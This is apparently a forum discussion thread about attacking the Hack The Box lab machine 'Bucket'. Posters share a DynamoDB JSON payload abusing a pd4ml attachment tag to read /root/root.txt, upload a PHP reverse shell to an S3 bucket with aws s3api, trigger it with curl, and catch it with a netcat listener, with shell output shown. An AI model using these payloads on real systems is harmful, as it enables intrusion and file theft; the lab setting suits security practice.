TUTORIAL Bucket Discussion
by Ro0ted - October 17, 2020 at 10:37 PM
#49
(October 18, 2020 at 08:54 PM)southerndarkness Wrote:
(October 18, 2020 at 07:25 PM)xxxyz Wrote: We need to trigger POST with :

{
    "alerts": [
        {
            "PutRequest": {
                "Item": {
                        "title": {"S":"Ransomware"} ,
                      "data":{"S":"<pd4ml:attachment description=\"attached.txt\" icon=\"PushPin\">file:///root/root.txt</pd4ml:attachment>"}             
                }
            }
        }
    ]
}

Something like that I try to make it work.

Any luck? I tried posting with that but got nothing :(

I could get a pdf file with a nicely-looking Pin ;-)
But nothing more...
Reply
#50
(October 18, 2020 at 09:13 PM)raidmail2020 Wrote:
(October 18, 2020 at 08:54 PM)southerndarkness Wrote:
(October 18, 2020 at 07:25 PM)xxxyz Wrote: We need to trigger POST with :

{
    "alerts": [
        {
            "PutRequest": {
                "Item": {
                        "title": {"S":"Ransomware"} ,
                      "data":{"S":"<pd4ml:attachment description=\"attached.txt\" icon=\"PushPin\">file:///root/root.txt</pd4ml:attachment>"}             
                }
            }
        }
    ]
}

Something like that I try to make it work.

Any luck? I tried posting with that but got nothing :(

I could get a pdf file with a nicely-looking Pin ;-)
But nothing more...

Dat PushPin tho
Reply
#51
(October 18, 2020 at 09:16 PM)southerndarkness Wrote:
(October 18, 2020 at 09:13 PM)raidmail2020 Wrote:
(October 18, 2020 at 08:54 PM)southerndarkness Wrote:
(October 18, 2020 at 07:25 PM)xxxyz Wrote: We need to trigger POST with :

{
    "alerts": [
        {
            "PutRequest": {
                "Item": {
                        "title": {"S":"Ransomware"} ,
                      "data":{"S":"<pd4ml:attachment description=\"attached.txt\" icon=\"PushPin\">file:///root/root.txt</pd4ml:attachment>"}             
                }
            }
        }
    ]
}

Something like that I try to make it work.

Any luck? I tried posting with that but got nothing :(

I could get a pdf file with a nicely-looking Pin ;-)
But nothing more...

Dat PushPin tho
where can i find the pdf?
Reply
#52
(October 18, 2020 at 09:59 PM)ARhOmOuTEd Wrote:
(October 18, 2020 at 09:16 PM)southerndarkness Wrote:
(October 18, 2020 at 09:13 PM)raidmail2020 Wrote:
(October 18, 2020 at 08:54 PM)southerndarkness Wrote:
(October 18, 2020 at 07:25 PM)xxxyz Wrote: We need to trigger POST with :

{
    "alerts": [
        {
            "PutRequest": {
                "Item": {
                        "title": {"S":"Ransomware"} ,
                      "data":{"S":"<pd4ml:attachment description=\"attached.txt\" icon=\"PushPin\">file:///root/root.txt</pd4ml:attachment>"}             
                }
            }
        }
    ]
}

Something like that I try to make it work.

Any luck? I tried posting with that but got nothing :(

I could get a pdf file with a nicely-looking Pin ;-)
But nothing more...

Dat PushPin tho
where can i find the pdf?

I don't know if it contains anything or if it works. The location of where the pdf is saved is in index.php of /var/www/bucket-app
Reply
#53
/var/www/bucket-app/index.php <---head is a target but i dont get it lol
Reply
#54
(October 19, 2020 at 02:37 AM)skorld Wrote: /var/www/bucket-app/index.php <---head is a target but i dont get it lol

index.php L24:
passthru("java -Xmx512m -Djava.awt.headless=true -cp pd4ml_demo.jar Pd4Cmd file:///var/www/bucket-app/files/$name 800 A4 -out files/result.pdf");
Reply
#55
(October 18, 2020 at 04:37 PM)Kali76 Wrote:
(October 18, 2020 at 04:35 PM)xxxyz Wrote: When you upload your file in the bucket adserver you need to wait the sync part. When the file in the bucket is out then you can check on the real server bucket.htb/....php

There is a sync feature you just need to wait and check.

I've been waiting for at least 10 minutes but nothing, it doesn't find any of the files I upload

short tip
use php reverse shell to copy to a bucket and try to curl it every 2secs since it takes time to deploy

watch -n2 curl http://bucket.htb/{bucket Name}/{file.php}

do this while listening on a port...

;-)
Reply
#56
Any one root yet? Still have no idea :(
Reply
#57
can anyone give a nudge to get user ?
Reply
#58
upload and put:

aws s3api put-object --endpoint-url http://s3.bucket.htb/ --bucket adserver --key shell.php --body shell.php

and
http://bucket.htb/shell.php

nc -nlvp 5555

and you have a shell netcat

[email protected]:~/# nc -nlvp 5555
Ncat: Version 7.80 ( https://nmap.org/ncat )
Ncat: Listening on :::5555
Ncat: Listening on 0.0.0.0:5555
Ncat: Connection from 10.10.10.212.
Ncat: Connection from 10.10.10.212:57594.
Linux bucket 5.4.0-48-generic #52-Ubuntu SMP Thu Sep 10 10:58:49 UTC 2020 x86_64 x86_64 x86_64 GNU/Linux
07:21:52 up 13:52, 3 users, load average: 0.04, 0.01, 0.00
USER TTY FROM [email protected] IDLE JCPU PCPU WHAT
roy pts/1 10.10.14.27 Sun17 8:39m 0.28s 0.28s -bash
roy pts/2 10.10.14.30 06:02 1:13m 0.08s 0.08s -bash
root pts/3 10.10.14.30 06:06 1:12m 0.02s 0.02s -bash
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ id && whoami && hostname
uid=33(www-data) gid=33(www-data) groups=33(www-data)
www-data
bucket
Reply
#59
I am a little confused here. I see the index.php and it does have the reference to:
passthru("java -Xmx512m -Djava.awt.headless=true -cp pd4ml_demo.jar Pd4Cmd file:///var/www/bucket-app/files/$name 800 A4 -out files/result.pdf");

We cannot edit this file because it is own by root. I have tried using burp to post what is above and modifying this to copy the /etc/passwd file as I know I would have access to it, but couldn't access anything. 

So I am a little lost here.....
Reply
#60
(October 18, 2020 at 09:13 PM)raidmail2020 Wrote:
(October 18, 2020 at 08:54 PM)southerndarkness Wrote:
(October 18, 2020 at 07:25 PM)xxxyz Wrote: We need to trigger POST with :

{
    "alerts": [
        {
            "PutRequest": {
                "Item": {
                        "title": {"S":"Ransomware"} ,
                      "data":{"S":"<pd4ml:attachment description=\"attached.txt\" icon=\"PushPin\">file:///root/root.txt</pd4ml:attachment>"}             
                }
            }
        }
    ]
}

Something like that I try to make it work.

Any luck? I tried posting with that but got nothing :(

I could get a pdf file with a nicely-looking Pin ;-)
But nothing more...

I can't find this stuff though how its shows alerts stuffs ?
Reply

Possibly Related Threads…
Thread Author Replies Views Last Post
TUTORIAL Cereal.htb discussion (no tutorial) Kali76 24 2,857 2 hours ago
Last Post: Kali76
TUTORIAL Luanne Tutorial/Discussion southerndarkness 32 3,654 8 hours ago
Last Post: Flovy
FLAG Bucket Commands to root y0ukn0wm3 5 1,469 Yesterday at 03:28 PM
Last Post: y0ukn0wm3

 Users browsing this thread: 3 Guest(s)